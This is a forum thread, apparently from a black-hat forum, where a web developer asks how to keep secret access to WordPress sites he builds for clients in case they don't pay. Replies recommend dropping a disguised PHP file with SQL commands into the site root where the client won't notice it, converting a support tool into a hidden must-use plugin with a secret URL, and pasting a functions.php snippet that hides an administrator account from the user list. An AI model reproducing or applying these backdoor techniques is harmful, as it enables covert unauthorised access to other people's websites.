53.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

12-16-2014, 12:55 AM
+5 REP Will be given for good WordPress Backdoor Plugin
Hey guys,

I am back again with another rep giving suggestion. I have lots of clients who needs website and few of them tried not to pay me so, i am looking for some plugin or hack for future websites. I dont want to crash client website but i just need a plugin or a script that will again gain me access to the wordpress site i create to the client. I can use script also and upload them via ftp while creating the site. I think some of the developer know the trick please teach me.!!

REp will be given for good answers
12-17-2014, 02:49 PM
RE:
Bump BUmp!!
12-17-2014, 03:21 PM
RE:
Why didn't you take half a deposit?

Ouch
--> Looking for people from the USA, I WILL PAY!!
CLICK HERE -> http://bestblackhatforum.com/Thread-Look...I-will-PAY
12-17-2014, 04:05 PM
RE:
You don't need a plugin (or want one - since plugins would run under the control of wordpress). You have access to the details of the mysql database dbname/user/pass. Write some sql commands and put them in a php file. Give it a name that is not used by WP but could be. Just put the file in the top level directory, and you can run it when you want. Unless your client is a WP expert (presumably not the case) he won't know it's not part of the normal WP files.
12-17-2014, 05:24 PM (This post was last modified: 12-17-2014 05:33 PM by BigLeech.)
RE:
Just in case you still have FTP access, you can make use of WPAAA.PHP – WordPress Access All Areas (Wordpress Support Tool).

It's a single file and you can easily create a Must-Use plugin out of it by just copying it into the must-use directory and doing some hacks. Additionally, it will auto-configure itself so that you have a secret URL to access the page

OR
You can do this with a custom function in your functions.php. Here is an example :
add_action('pre_user_query','yoursite_pre_user_query');function yoursite_pre_user_query($user_search){global $current_user;
$username = $current_user->user_login;if($username =='<USERNAME OF OTHER ADMIN>'){global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',"WHERE 1=1 AND {$wpdb->users}.user_login != '<YOUR USERNAME>'",$user_search->query_where);}}

http://stackoverflow.com/questions/20922...-user-list
52.gif
12-18-2014, 12:15 PM
RE:
Rather than FTP i liked the functions.php editing file so how do i add a password there can you teach me that like give an example or something for site xxx.com and username admin and pass password. Thankyou! and rep added.!
(12-17-2014 05:24 PM)BigLeech Wrote:  Just in case you still have FTP access, you can make use of WPAAA.PHP – WordPress Access All Areas (Wordpress Support Tool).

It's a single file and you can easily create a Must-Use plugin out of it by just copying it into the must-use directory and doing some hacks. Additionally, it will auto-configure itself so that you have a secret URL to access the page

OR
You can do this with a custom function in your functions.php. Here is an example :
add_action('pre_user_query','yoursite_pre_user_query');function yoursite_pre_user_query($user_search){global $current_user;
$username = $current_user->user_login;if($username ==''){global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',"WHERE 1=1 AND {$wpdb->users}.user_login != ''",$user_search->query_where);}}

http://stackoverflow.com/questions/20922...-user-list

</username>
12-18-2014, 12:18 PM
RE:
Interesting topic, WPAAA.PHP look efficient!
12-18-2014, 12:18 PM
RE:
Can you give me a tutorial.. Please rep already addded and for good tut.. i will add again!
(12-17-2014 04:05 PM)sjc999 Wrote:  You don't need a plugin (or want one - since plugins would run under the control of wordpress). You have access to the details of the mysql database dbname/user/pass. Write some sql commands and put them in a php file. Give it a name that is not used by WP but could be. Just put the file in the top level directory, and you can run it when you want. Unless your client is a WP expert (presumably not the case) he won't know it's not part of the normal WP files.

56.gif